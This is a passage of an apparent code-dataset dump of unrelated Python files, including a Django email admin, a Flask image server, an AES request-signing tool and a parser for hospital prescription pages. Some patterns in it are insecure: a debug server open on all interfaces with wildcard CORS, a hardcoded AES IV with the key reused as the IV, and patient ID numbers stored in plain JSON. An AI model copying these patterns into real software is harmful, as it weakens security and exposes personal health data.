warnings.warn(\"Cannot use any editor between {0} because they are not installed. \"\n \"Have you installed and configured one of them properly?\"\n \"Either you can configure POSTOFFICE_WYSIWYG_EDITORS to use your own editor\"\n \"\".format([_editor[1]\n for _editor\n in postoffice_settings.get_wysiwyg_editors()]),\n ImportWarning)\n return super(EmailTemplateAdminMixin,self).formfield_for_dbfield(db_field, request, **kwargs)\n\n def display_html_mail_preview(self,obj=None):\n content_preview = render_to_template_email(obj.html_content.replace('{{', '{').replace('}}', '}'), {},\n is_plain_text=False)\n return mark_safe(strip_spaces_between_tags(mark_safe(\"\"\"\n
\n \n
{help_text}
\n
\n \"\"\".format(**{'help_text': _('*The field in brackets are variables!'),\n 'mail_message': escape(strip_spaces_between_tags(content_preview))})\n )))\n display_html_mail_preview.short_description=_(\"Preview HTML\")\n\n def display_plain_mail_preview(self,obj=None):\n content_preview = render_to_template_email(obj.html_content.replace('{{', '{').replace('}}', '}'), {},\n is_plain_text=True)\n return mark_safe(strip_spaces_between_tags(mark_safe(\"\"\"\n
\n \n
{help_text}
\n
\n \"\"\".format(**{'help_text': _('*The field in brackets are variables!'),\n 'mail_message': escape(strip_spaces_between_tags(content_preview))})\n )))\n display_plain_mail_preview.short_description=_(\"Preview Plain\")\n\nclass EmailTemplateInline(EmailTemplateAdminMixin,\n admin.StackedInline):\n form = EmailTemplateAdminForm\n formset = EmailTemplateInlineFormset\n model = EmailTemplate\n verbose_name_plural = _(\"Email Contents\")\n #extra = 0\n fk_name = 'default_template'\n\n fieldsets = ((None, {\n 'fields': (\n ('language', 'template_path','subject',),\n ('content_data',),\n ('display_html_mail_preview',),\n ),\n }),)\n\n\n def get_extra(self, request, obj=None, **kwargs):\n \"\"\"Hook for customizing the number of extra inline forms.\"\"\"\n if obj:\n return len(settings.LANGUAGES) - 1 - obj.translated_templates.count()\n else:\n return len(settings.LANGUAGES) - 1\n\n def get_max_num(self, request, obj=None, **kwargs):\n return len(settings.LANGUAGES) - 1\n\nclass EmailTemplateAdmin(EmailTemplateAdminMixin,\n admin.ModelAdmin):\n change_form_template = 'admin/post_office/email_template_change_form.html'\n form = EmailTemplateAdminForm\n list_display = ('label', 'name', 'template_path','description_shortened', 'subject', 'languages_compact', 'created')\n search_fields = ('label', 'name', 'description', 'subject')\n if settings.USE_I18N:\n inlines = (EmailTemplateInline, AttachmentTemplateInline)\n else:\n inlines = (AttachmentTemplateInline,)\n\n fieldsets = (\n (None, {\n 'fields': (\n ('name',),\n ('label', 'description'),\n )}),\n (None, {\n 'fields': (\n ('template_path','subject',),\n ('content_data',),\n ('display_html_mail_preview'),\n ),\n 'classes':['js-move-to-tabs-default']\n }),\n )\n\n\n def render_change_form(self, request, context, **kwargs):\n context = context or {}\n context.update({\n \"DEFAULT_LANGUAGE\": settings.LANGUAGE_CODE,\n \"USE_I18N\": settings.USE_I18N\n })\n return super(EmailTemplateAdmin,self).render_change_form(request, context, **kwargs)\n\n def formfield_for_dbfield(self, db_field, request, **kwargs):\n if db_field.name == 'template_path':\n kwargs.update({'initial':EmailTemplate.TEMPLATE_CHOICES[0][0]})\n return super(EmailTemplateAdmin,self).formfield_for_dbfield(db_field, request, **kwargs)\n\n def get_queryset(self, request):\n return self.model.objects.filter(default_template__isnull=True)\n\n def description_shortened(self, instance):\n return Truncator(instance.description.split('\\n')[0]).chars(200)\n description_shortened.short_description = _(\"Description\")\n description_shortened.admin_order_field = 'description'\n\n def languages_compact(self, instance):\n languages = [tt.language for tt in instance.translated_templates.order_by('language')]\n return ', '.join(languages)\n languages_compact.short_description = _(\"Languages\")\n\n def save_model(self, request, obj, form, change):\n obj.save()\n # if the name got changed, also change the translated templates to match again\n if 'name' in form.changed_data:\n obj.translated_templates.update(name=obj.name)\n\n\nclass AttachmentAdmin(admin.ModelAdmin):\n list_display = ('name', 'file', 'mimetype')\n\nclass AttachmentTemplateAdmin(admin.ModelAdmin):\n list_display = ('name', 'file', 'mimetype')\n fields = ('name', 'file', 'mimetype')\n\n\n\nadmin.site.register(Email, EmailAdmin)\nadmin.site.register(Log, LogAdmin)\nadmin.site.register(EmailTemplate, EmailTemplateAdmin)\nadmin.site.register(Attachment, AttachmentAdmin)\nadmin.site.register(AttachmentTemplate, AttachmentTemplateAdmin)","sub_path":"post_office/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"260817144","text":"#!/usr/bin/env python3\n\nimport csv\n\nheader = [\"title\", \"authors\", \"groups\", \"keywords\", \"topics\", \"abstract\"]\n\ndef shared_word_count(words, text):\n text_words = text.split(\" \")\n c = 0\n for a, b in zip(words, text_words):\n if a == b:\n c += 1\n return c\n\ndef find(dataset, keywords):\n i = header.index(\"abstract\")\n abstracts = list(map(lambda row: row[i], dataset))\n results = list(sorted(zip(range(len(abstracts)), abstracts), key=lambda x: shared_word_count(keywords, x[1].lower()), reverse=True))[:10]\n return [dataset[i] for i,v in results]\n\n\ndef prompt(dataset):\n keywords = input('> ').split(\" \")\n title_index = header.index(\"title\")\n print(\"\\n\".join([corpus[title_index] for corpus in find(dataset, keywords)]))\n\n\nif __name__ == '__main__':\n dataset = None\n with open('[UCI] AAAI-14 Accepted Papers - Papers.csv', \"r\", encoding='utf-8') as csvfile:\n dataset = csv.reader(csvfile)\n dataset = list(dataset)\n while True:\n prompt(dataset)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"468894785","text":"# print('Enter number of students in each class seperated by space.')\n\n# studentList = list(map(int, input().split()))\n\nstudentList = list(map(int, input('Enter number of students in each class seperated by space.\\n').split()))\n\ndef desksReq(students):\n desks = students/2 if students%2==0 else students//2 + 1\n return desks\n\ndesksList = list(map(desksReq, studentList))\n\nprint(desksList)\nsum = 0\nfor item in desksList:\n sum += item\n\nprint(sum, 'is the number of desks required.') \n\n","sub_path":"practice/desks.py","file_name":"desks.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"461650618","text":"from flask import Flask, render_template, request, jsonify\r\nfrom flask_cors import CORS\r\nimport mdata as md\r\nimport cv2\r\n\r\nimport bender\r\nimport mfilter\r\nimport gorun\r\n\r\n\r\n# 앱 설정\r\napp = Flask(__name__,\r\n static_folder=md.appstatic,\r\n template_folder=md.appstatic)\r\napp.config['UPLOAD_FOLDER'] = md.src\r\ncors = CORS(app, resources= {\r\n r\"*\": {\"origin\": \"*\"}\r\n})\r\n\r\n# 앱 프론트 전송\r\n@app.route(\"/\")\r\ndef front():\r\n return render_template(\"index.html\")\r\n\r\n# 이미지 디렉토리 조회\r\n@app.route(\"/list-source\")\r\ndef img_listing():\r\n return jsonify(md.listing(md.src))\r\n\r\n#이미지 밴\r\n@app.route('/image-banding', methods = ['GET', 'POST'])\r\ndef img_banding():\r\n data = md.jsonparse(request.data)\r\n result = bender.bend(data['image'], data['coord'], data['bound'])\r\n\r\n send = []\r\n for key in result:\r\n md.wipetemp(key, data['image'])\r\n tmp = md.savetemp(key, data['image'], result[key])\r\n send.append(key + '/' + tmp)\r\n\r\n return jsonify(send)\r\n\r\n#필터이미지 생성\r\n@app.route('/run-filter', methods = ['GET', 'POST'])\r\ndef img_filter():\r\n data = md.jsonparse(request.data)\r\n result = mfilter.run_filter(data['image'], data['filter-param'])\r\n return jsonify([result])\r\n\r\n@app.route('/go-run-task', methods=['GET', 'POST'])\r\ndef go_run_task():\r\n data = md.jsonparse(request.data)\r\n result = gorun.proccess2(data['image'])\r\n return jsonify(result)\r\n\r\n\r\nfor name in md.listing(md.uploads):\r\n print(name)\r\n img = md.loadimg(md.uploads, name)\r\n md.saveimg(md.src, name.split('.')[0] + '.png', img)\r\n _, width, _ = img.shape\r\n ratio = 150 / width\r\n md.saveimg('thum', name.split('.')[0] + '.png', cv2.resize(img, None, fx=ratio, fy=ratio))\r\n\r\n# 앱 구동\r\nif __name__ == \"__main__\":\r\n # Only for debugging while developing\r\n\r\n app.run(host='0.0.0.0', debug=True, port= 80)\r\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"576887824","text":"# -*- coding:utf-8 -*-\r\n\r\nimport time\r\nimport hmac\r\nimport hashlib\r\nimport json\r\nimport uuid\r\nfrom decimal import Decimal\r\n\r\n\r\nfrom Crypto.Cipher import AES\r\nimport base64\r\n\r\n\r\ndef pkcs7padding(text):\r\n \"\"\"\r\n 明文使用PKCS7填充\r\n 最终调用AES加密方法时,传入的是一个byte数组,要求是16的整数倍,因此需要对明文进行处理\r\n :param text: 待加密内容(明文)\r\n :return:\r\n \"\"\"\r\n bs = AES.block_size # 16\r\n length = len(text)\r\n bytes_length = len(bytes(text, encoding='utf-8'))\r\n # tips:utf-8编码时,英文占1个byte,而中文占3个byte\r\n padding_size = length if(bytes_length == length) else bytes_length\r\n padding = bs - padding_size % bs\r\n # tips:chr(padding)看与其它语言的约定,有的会使用'\\0'\r\n padding_text = chr(padding) * padding\r\n return text + padding_text\r\n\r\n\r\ndef pkcs7unpadding(text):\r\n \"\"\"\r\n 处理使用PKCS7填充过的数据\r\n :param text: 解密后的字符串\r\n :return:\r\n \"\"\"\r\n length = len(text)\r\n unpadding = ord(text[length-1])\r\n return text[0:length-unpadding]\r\n\r\n\r\ndef encrypt(key, content):\r\n \"\"\"\r\n AES加密\r\n key,iv使用同一个\r\n 模式cbc\r\n 填充pkcs7\r\n :param key: 密钥\r\n :param content: 加密内容\r\n :return:\r\n \"\"\"\r\n key_bytes = bytes(key, encoding='utf-8')\r\n iv = bytes('ff465fdecc764337', encoding='utf-8')\r\n\r\n cipher = AES.new(key_bytes, AES.MODE_CBC, iv)\r\n # 处理明文\r\n content_padding = pkcs7padding(content)\r\n # 加密\r\n encrypt_bytes = cipher.encrypt(bytes(content_padding, encoding='utf-8'))\r\n # 重新编码\r\n result = str(base64.b64encode(encrypt_bytes), encoding='utf-8')\r\n return result\r\n\r\n\r\ndef decrypt(key, content):\r\n \"\"\"\r\n AES解密\r\n key,iv使用同一个\r\n 模式cbc\r\n 去填充pkcs7\r\n :param key:\r\n :param content:\r\n :return:\r\n \"\"\"\r\n key_bytes = bytes(key, encoding='utf-8')\r\n iv = key_bytes\r\n cipher = AES.new(key_bytes, AES.MODE_CBC, iv)\r\n # base64解码\r\n encrypt_bytes = base64.b64decode(content)\r\n # 解密\r\n decrypt_bytes = cipher.decrypt(encrypt_bytes)\r\n # 重新编码\r\n result = str(decrypt_bytes, encoding='utf-8')\r\n # 去除填充内容\r\n result = pkcs7unpadding(result)\r\n return result\r\n\r\n\r\ndef generateUnixTime():\r\n unixTime = int(time.time())\r\n return unixTime\r\n\r\n\r\ndef HMACSHA256Encrypt(val, key):\r\n signature = hmac.new(bytes(key, encoding='utf-8'), bytes(val, encoding='utf-8'),\r\n digestmod=hashlib.sha256).digest()\r\n HEX = signature.hex()\r\n return HEX\r\n\r\n\r\n# 补足字符串长度为16的倍数\r\ndef add_to_16(s):\r\n while len(s) % 16 != 0:\r\n s += '\\0'\r\n return str.encode(s) # 返回bytes\r\n\r\n\r\ndef AESEncrypt(text, key):\r\n aes = AES.new(str.encode(key), AES.MODE_CBC, iv=str.encode('ff465fdecc764337')) # 初始化加密器\r\n ncrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\\n', '')\r\n return ncrypted_text\r\n\r\n\r\ndef GenerateSignature(app_key, api_secret):\r\n unixTime = generateUnixTime()\r\n print('unixTime', unixTime)\r\n signature = HMACSHA256Encrypt(f\"{app_key}{str(unixTime)}{api_secret}\", api_secret)\r\n print('signature', signature)\r\n\r\n\r\ndef GenerateRequestObj(api_secret):\r\n Name = input('请输入姓名:')\r\n CertificateNum = input('请输入身份证:')\r\n PhoneNum = input('请输入手机号:')\r\n CertificateType = 1\r\n request_list = []\r\n while True:\r\n operate = input('是否继续生成结算信息:y继续输入,n停止输入:')\r\n if operate == 'y':\r\n BankCardNum = input('请输入银行卡号:')\r\n BankName = input('请输入银行名称:')\r\n Money = input('请输入金额:')\r\n request_list.append(\r\n {\r\n 'Name': Name,\r\n 'CertificateNum': CertificateNum,\r\n 'PhoneNum': PhoneNum,\r\n 'CertificateType': CertificateType,\r\n 'BankCardNum': BankCardNum,\r\n 'BankName': BankName,\r\n 'Money': Money,\r\n 'OrderRandomCode': str(uuid.uuid4())\r\n })\r\n else:\r\n request_tr = json.dumps(request_list)\r\n print(encrypt(api_secret,request_tr))\r\n break\r\n\r\ndef GenerateQuerySettle(api_secret):\r\n code = input('请输入结算单号:')\r\n print(encrypt(api_secret,code))\r\n\r\n\r\nif __name__ == '__main__':\r\n app_key = input('请输入app_key:')\r\n api_secret = input('请输入api_secret:')\r\n while True:\r\n operate = input('请输入操作类型:1生成签名,2添加结算单,3查���结算单:')\r\n if operate == '1':\r\n GenerateSignature(app_key, api_secret)\r\n elif operate == '2':\r\n GenerateRequestObj(api_secret)\r\n elif operate == '3':\r\n GenerateQuerySettle(api_secret)\r\n else:\r\n break\r\n","sub_path":"GordenTestTeam/testTeamApp/apiTestPro/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"60782588","text":"import numpy as np\r\nimport math\r\nimport time\r\n\r\n\r\ninput_file_name = './C-large.in'\r\noutput_file_name = './C-large.out'\r\n\r\nmult_dict = {'11': '1', '1i':'i', '1j': 'j', '1k':'k',\r\n 'i1': 'i', 'ii':'1', 'ij': 'k', 'ik':'j',\r\n 'j1': 'j', 'ji':'k', 'jj': '1', 'jk':'i',\r\n 'k1': 'k', 'ki':'j', 'kj': 'i', 'kk':'1'}\r\n\r\nsign_dict = {'11': 1, '1i':1, '1j': 1, '1k':1,\r\n 'i1': 1, 'ii':-1, 'ij': 1, 'ik':-1,\r\n 'j1': 1, 'ji':-1, 'jj': -1, 'jk':1,\r\n 'k1': 1, 'ki':1, 'kj': -1, 'kk':-1}\r\n\r\ndef get_product(string_list):\r\n # assume length at least 1\r\n if len(string_list) == 0:\r\n return ''\r\n current_prod = string_list[0]\r\n current_sign = 1\r\n for i in range(1, len(string_list)):\r\n string_bit = current_prod + string_list[i]\r\n current_prod = mult_dict[string_bit]\r\n current_sign *= sign_dict[string_bit]\r\n if current_sign == -1:\r\n return '-' + current_prod\r\n else:\r\n return current_prod\r\n\r\ndef get_running_product(string_list):\r\n # assume length at least 1\r\n out_string_list = []\r\n current_prod = string_list[0]\r\n current_sign = 1\r\n out_string_list.append(current_prod)\r\n for i in range(1, len(string_list)):\r\n string_bit = current_prod + string_list[i]\r\n current_prod = mult_dict[string_bit]\r\n current_sign *= sign_dict[string_bit]\r\n if current_sign == -1:\r\n out_string_list.append('-' + current_prod)\r\n else:\r\n out_string_list.append(current_prod)\r\n return out_string_list\r\n\r\ndef get_running_product_rev(string_list):\r\n # string_list should be reversed before running func\r\n # assume length at least 1\r\n out_string_list = []\r\n current_prod = string_list[0]\r\n current_sign = 1\r\n out_string_list.append(current_prod)\r\n for i in range(1, len(string_list)):\r\n string_bit = string_list[i] + current_prod\r\n current_prod = mult_dict[string_bit]\r\n current_sign *= sign_dict[string_bit]\r\n if current_sign == -1:\r\n out_string_list.append('-' + current_prod)\r\n else:\r\n out_string_list.append(current_prod)\r\n return out_string_list\r\n \r\n \r\n\r\nif __name__ == '__main__':\r\n\r\n input_file = open(input_file_name, 'r')\r\n output_file = open(output_file_name, 'w')\r\n\r\n # get info from input file\r\n file_line = input_file.readline()\r\n file_line = file_line.replace('\\n', '')\r\n num_cases = int(file_line)\r\n\r\n case_num = 1\r\n while True:\r\n possible = True\r\n file_line = input_file.readline()\r\n if file_line == '' or file_line == '\\n':\r\n input_file.close()\r\n break\r\n file_line = file_line.replace('\\n', '')\r\n file_line_list = file_line.split()\r\n L = int(file_line_list[0])\r\n X = int(file_line_list[1])\r\n\r\n letter_string = input_file.readline().replace('\\n', '')\r\n\r\n repeated_letter_string = letter_string*min(X, 25)\r\n## print(repeated_letter_string) ##\r\n string_list = [letter for letter in repeated_letter_string]\r\n## print(string_list) ##\r\n string_list_rev = string_list[::-1]\r\n\r\n # find cycle length\r\n product_string_list = get_running_product(string_list)\r\n## print(product_string_list) ##\r\n product_string_list_rev = get_running_product_rev(string_list_rev)\r\n## print(product_string_list_rev) ##\r\n for test_x in range(1, min(X, 25)):\r\n if product_string_list[test_x*L] == product_string_list[0]:\r\n cycle_length = test_x*L\r\n break\r\n else:\r\n cycle_length = 100000000 # arbitrary large number\r\n\r\n## print(cycle_length) ##\r\n \r\n # find first i index\r\n for letter_i, letter in enumerate(product_string_list):\r\n if letter == 'i':\r\n i_index = letter_i\r\n break\r\n else:\r\n## print('test1') ##\r\n possible = False\r\n\r\n## print(i_index) ##\r\n\r\n # find first k index\r\n for letter_i, letter in enumerate(product_string_list_rev):\r\n if letter == 'k':\r\n k_index = X*L - letter_i - 1\r\n break\r\n else:\r\n## print('test2') ##\r\n possible = False\r\n\r\n## print(k_index) ##\r\n\r\n\r\n if k_index - 1 <= i_index:\r\n## print('test3') ##\r\n possible = False\r\n\r\n # test for j\r\n if possible == True:\r\n j_length = (k_index - i_index - 1) % cycle_length\r\n## print(string_list[(i_index + 1):(i_index + 1 + j_length)]) ##\r\n## print(get_product(string_list[(i_index + 1):(i_index + 1 + j_length)])) ##\r\n if get_product(string_list[(i_index + 1):(i_index + 1 + j_length)]) == 'j':\r\n possible = True\r\n else:\r\n possible = False\r\n\r\n if possible == True:\r\n output = 'YES'\r\n else:\r\n output = 'NO'\r\n output_string = 'Case #' + str(case_num) + ': %s\\n' % output\r\n\r\n output_file.write(output_string) ##\r\n print(output_string)\r\n case_num += 1\r\n \r\n output_file.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"solutions_5670465267826688_1/Python/ScottyP/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"551924830","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n\n# VM Mngr Exceptions\nEXCEPT_DO_NOT_UPDATE_PC = 1 << 25\n\nEXCEPT_CODE_AUTOMOD = (1 << 0)\nEXCEPT_SOFT_BP = (1 << 1)\nEXCEPT_INT_XX = (1 << 2)\nEXCEPT_BREAKPOINT_INTERN = (1 << 10)\n\nEXCEPT_ACCESS_VIOL = ((1 << 14) | EXCEPT_DO_NOT_UPDATE_PC)\n# VM Mngr constants\n\nPAGE_READ = 1\nPAGE_WRITE = 2\nPAGE_EXEC = 4\n\nBREAKPOINT_READ = 1\nBREAKPOINT_WRITE = 2\n\n","sub_path":"miasm2/jitter/csts.py","file_name":"csts.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301392385","text":"import os\nimport re\nimport inspect\nimport collections\nfrom .lib import RestMethods\nfrom queue import Queue\n\nfrom pype.api import Logger\n\nlog = Logger().get_logger(\"RestApiFactory\")\n\n\ndef prepare_fullpath(path, prefix):\n \"\"\"Concatenate registered path and prefix with right form.\n\n :param path: Registered url path for registered callback.\n :type path: str, list\n :param prefix: Registered and prepared url prefix.\n :type prefix: str, None\n :return: concatenated prefix and path in right form\n :rtype: str\n \"\"\"\n\n if isinstance(path, (list, tuple)):\n path_items = path\n else:\n path_items = [part for part in path.split(\"/\") if part]\n\n fullpath = \"/\"\n if path and prefix:\n items = [part for part in prefix.split(\"/\") if part]\n items.extend(path_items)\n fullpath = \"/\".join(items)\n if path.endswith(\"/\"):\n fullpath += \"/\"\n\n elif path:\n fullpath = \"/\".join(path_items)\n if path.endswith(\"/\"):\n fullpath += \"/\"\n\n elif prefix:\n fullpath = prefix\n\n if not fullpath.startswith(\"/\"):\n fullpath = \"/{}\".format(fullpath)\n\n return fullpath\n\n\ndef prepare_regex_from_path(full_path, strict_match):\n \"\"\"Prepare regex based on set path.\n\n When registered path do not contain dynamic keys regex is not set.\n Dynamic keys are specified with \"<\" and \">\" (\"<{dynamic key}>\").\n\n :param full_path: Full url path (prefix + path) for registered callback.\n :type full_path: str, list, None\n :return: regex and keys of all groups in regex\n :rtype: tuple(SRE_Pattern, list), tuple(None, None)\n \"\"\"\n get_indexes_regex = \"<[^< >]+>\"\n all_founded_keys = re.findall(get_indexes_regex, full_path)\n if not all_founded_keys:\n return None, None\n\n regex_path = full_path\n keys = []\n for key in all_founded_keys:\n replacement = \"(?P{}\\w+)\".format(key)\n keys.append(key.replace(\"<\", \"\").replace(\">\", \"\"))\n if not strict_match:\n if full_path.endswith(key):\n replacement = \"?{}?\".format(replacement)\n regex_path = regex_path.replace(key, replacement)\n\n regex_path = \"^{}$\".format(regex_path)\n\n return re.compile(regex_path), keys\n\n\ndef prepare_prefix(url_prefix):\n \"\"\"Check if the url_prefix is set and is in correct form.\n\n Output is None when prefix is empty or \"/\".\n\n :param url_prefix: Registered prefix of registered callback.\n :type url_prefix: str, list, None\n :return: Url prefix of registered callback\n :rtype: str, None\n \"\"\"\n if url_prefix is None or url_prefix.strip() == \"/\":\n return None\n elif isinstance(url_prefix, (list, tuple)):\n url_prefix = \"/\".join(url_prefix)\n else:\n items = [part for part in url_prefix.split(\"/\") if part]\n url_prefix = \"/\".join(items)\n\n if not url_prefix:\n return None\n\n while url_prefix.endswith(\"/\"):\n url_prefix = url_prefix[:-1]\n\n if not url_prefix.startswith(\"/\"):\n url_prefix = \"/{}\".format(url_prefix)\n\n return url_prefix\n\n\ndef prepare_methods(methods, callback=None):\n \"\"\"Check and convert entered methods.\n\n String `methods` is converted to list. All values are converted to\n `RestMethods` enum object. Invalid methods are ignored and printed out.\n\n :param methods: Contain rest api methods, when callback is called.\n :type methods: str, list\n :param callback: Registered callback, helps to identify where is\n invalid method.\n :type callback: function, method, optional\n :return: Valid methods\n :rtype: list\n \"\"\"\n invalid_methods = collections.defaultdict(list)\n\n if not methods:\n _methods = [RestMethods.GET]\n elif isinstance(methods, str) or isinstance(methods, RestMethods):\n _method = RestMethods.get(methods)\n _methods = []\n if _method is None:\n invalid_methods[methods].append(callback)\n else:\n _methods.append(_method)\n\n else:\n _methods = []\n for method in methods:\n found = False\n _method = RestMethods.get(method)\n if _method is None:\n invalid_methods[methods].append(callback)\n continue\n\n _methods.append(_method)\n\n for method, callbacks in invalid_methods.items():\n callback_info = \"\"\n\n callbacks = [cbk for cbk in callbacks if cbk]\n if len(callbacks) > 0:\n multiple_ind = \"\"\n if len(callbacks) > 1:\n multiple_ind = \"s\"\n\n callback_items = []\n for callback in callbacks:\n callback_items.append(\"\\\"{}<{}>\\\"\".format(\n callback.__qualname__, callback.__globals__[\"__file__\"]\n ))\n\n callback_info = \" with callback{} {}\".format(\n multiple_ind, \"| \".join(callback_items)\n )\n\n log.warning(\n (\"Invalid RestApi method \\\"{}\\\"{}\").format(method, callback_info)\n )\n\n return _methods\n\n\ndef prepare_callback_info(callback):\n \"\"\"Prepare data for callback handling when should be triggered.\"\"\"\n callback_info = inspect.getfullargspec(callback)\n\n callback_args = callback_info.args\n callback_args_len = 0\n if callback_args:\n callback_args_len = len(callback_args)\n if type(callback).__name__ == \"method\":\n callback_args_len -= 1\n\n defaults = callback_info.defaults\n defaults_len = 0\n if defaults:\n defaults_len = len(defaults)\n\n annotations = callback_info.annotations\n\n return {\n \"args\": callback_args,\n \"args_len\": callback_args_len,\n \"defaults\": defaults,\n \"defaults_len\": defaults_len,\n \"hasargs\": callback_info.varargs is not None,\n \"haskwargs\": callback_info.varkw is not None,\n \"annotations\": annotations\n }\n\n\nclass _RestApiFactory:\n \"\"\"Factory is used to store and prepare callbacks for requests.\n\n Should be created only one object used for all registered callbacks when\n it is expected to run only one http server.\n \"\"\"\n registered_objs = []\n unprocessed_routes = []\n unprocessed_statics = Queue()\n\n prepared_routes = {\n method: collections.defaultdict(list) for method in RestMethods\n }\n prepared_statics = {}\n\n has_routes = False\n\n def has_handlers(self):\n return (self.has_routes or self.prepared_statics)\n\n def _process_route(self, route):\n return self.unprocessed_routes.pop(\n self.unprocessed_routes.index(route)\n )\n\n def register_route(\n self, path, callback, url_prefix, methods, strict_match\n ):\n log.debug(\"Registering callback for item \\\"{}\\\"\".format(\n callback.__qualname__\n ))\n route = {\n \"path\": path,\n \"callback\": callback,\n \"url_prefix\": url_prefix,\n \"methods\": methods,\n \"strict_match\": strict_match\n }\n self.unprocessed_routes.append(route)\n\n def register_obj(self, obj):\n \"\"\"Register object for decorated methods in class definition.\"\"\"\n self.registered_objs.append(obj)\n\n def register_statics(self, item):\n log.debug(\"Registering statics path \\\"{}\\\"\".format(item))\n self.unprocessed_statics.put(item)\n\n def _prepare_route(self, route):\n \"\"\"Prepare data of registered callbacks for routes.\n\n Registration info are prepared to easy filter during handling\n of requests.\n\n :param route: Contain all necessary info for filtering and\n handling callback for registered route.\n :type route: dict\n \"\"\"\n callback = route[\"callback\"]\n methods = prepare_methods(route[\"methods\"], callback)\n url_prefix = prepare_prefix(route[\"url_prefix\"])\n fullpath = prepare_fullpath(route[\"path\"], url_prefix)\n regex, regex_keys = prepare_regex_from_path(\n fullpath, route[\"strict_match\"]\n )\n callback_info = prepare_callback_info(callback)\n\n for method in methods:\n self.has_routes = True\n self.prepared_routes[method][url_prefix].append({\n \"regex\": regex,\n \"regex_keys\": regex_keys,\n \"fullpath\": fullpath,\n \"callback\": callback,\n \"callback_info\": callback_info\n })\n\n def prepare_registered(self):\n \"\"\"Iter through all registered callbacks and statics to prepare them.\n\n First are processed callbacks registered with decorators in classes by\n registered objects. Remaining callbacks are filtered, it is checked if\n methods has `__self__` or are defined in (it is expeted they\n do not requise access to object)\n \"\"\"\n\n while not self.unprocessed_statics.empty():\n url_prefix, dir_path = self.unprocessed_statics.get()\n dir_path = os.path.normpath(dir_path)\n if not os.path.exists(dir_path):\n log.warning(\n \"Directory path \\\"{}\\\" was not found\".format(dir_path)\n )\n continue\n url_prefix = prepare_prefix(url_prefix)\n self.prepared_statics[url_prefix] = dir_path\n\n for obj in self.registered_objs:\n method_names = [\n attr for attr in dir(obj)\n if inspect.ismethod(getattr(obj, attr))\n ]\n for method_name in method_names:\n method = obj.__getattribute__(method_name)\n if not hasattr(method, \"restapi\"):\n continue\n\n if not method.restapi:\n continue\n\n for route in list(self.unprocessed_routes):\n callback = route[\"callback\"]\n if not (\n callback.__qualname__ == method.__qualname__ and\n callback.__module__ == method.__module__ and\n callback.__globals__[\"__file__\"] == (\n method.__globals__[\"__file__\"]\n )\n ):\n continue\n\n route[\"callback\"] = method\n self._process_route(route)\n self._prepare_route(route)\n break\n\n for route in list(self.unprocessed_routes):\n callback = route[\"callback\"]\n is_class_method = len(callback.__qualname__.split(\".\")) != 1\n if is_class_method:\n missing_self = True\n if hasattr(callback, \"__self__\"):\n if callback.__self__ is not None:\n missing_self = False\n\n if \"\" in callback.__qualname__:\n pass\n\n elif missing_self:\n log.warning((\n \"Object of callback \\\"{}\\\" from \\\"{}\\\" is not\"\n \" accessible for api. Register object or\"\n \" register callback with already created object\"\n \"(not with decorator in class).\".format(\n callback.__qualname__,\n callback.__globals__[\"__file__\"]\n )\n ))\n continue\n\n self._prepare_route(route)\n continue\n\n self._prepare_route(route)\n","sub_path":"pype/modules/rest_api/lib/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":11446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"262457719","text":"import os\nimport json\nfrom bs4 import BeautifulSoup\n\nexport_data = list()\nfile_dir = input('Please input html file direction: ')\n\nfor dirPath, dirNames, fileNames in os.walk(file_dir):\n for f in fileNames:\n filePath = os.path.join(dirPath, f)\n if \"醫令明細表\" in filePath:\n soup = BeautifulSoup(open(filePath))\n\n id_number = soup.find(id = \"cph_lblID3\").string\n\n tr_list = soup.find_all(\"tr\")\n hospital = str()\n year = int()\n month = int()\n day = int()\n\n index = 9\n while True:\n td_list = tr_list[index].find_all(\"td\")\n if len(td_list) == 1: # skip \n pass\n elif len(td_list) == 4: # parse drug\n medical_order = td_list[1].string.split()[0]\n if len(medical_order) == 10:\n medical_name = td_list[2].div.string.split()[0]\n medical_volume = float(td_list[3].string.split()[0])\n medical_dict = {\n \"id_number\": id_number,\n \"hospital\": hospital,\n \"year\": year,\n \"month\": month,\n \"day\": day,\n \"medical_order\": medical_order,\n \"medical_name\": medical_name,\n \"medical_volume\": medical_volume\n }\n export_data.append(medical_dict)\n elif len(td_list) == 18:\n break\n else: # parse hospital\n hospital = td_list[1].string.split()[0]\n date = str(td_list[2]).split()[4].split(\"<\")[0].split(\"/\")\n if date[0] == '':\n date = str(td_list[3]).split()[4].split(\"<\")[0].split(\"/\")\n year = int(date[0])\n month = int(date[1])\n day = int(date[2])\n else:\n year = int(date[0])\n month = int(date[1])\n day = int(date[2])\n\n index += 1\n\nwith open(\"medical_data.json\", \"w\") as f:\n json.dump(export_data, f, ensure_ascii=False, indent=4)\n","sub_path":"parse_drug_html.py","file_name":"parse_drug_html.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"173398632","text":"#! usr/bin/env python\n\n\"\"\"\nAssignment 14_Task3:\n\nWritten without using map.\nTried many times without any success, so here is the script doing the same \\\nthing 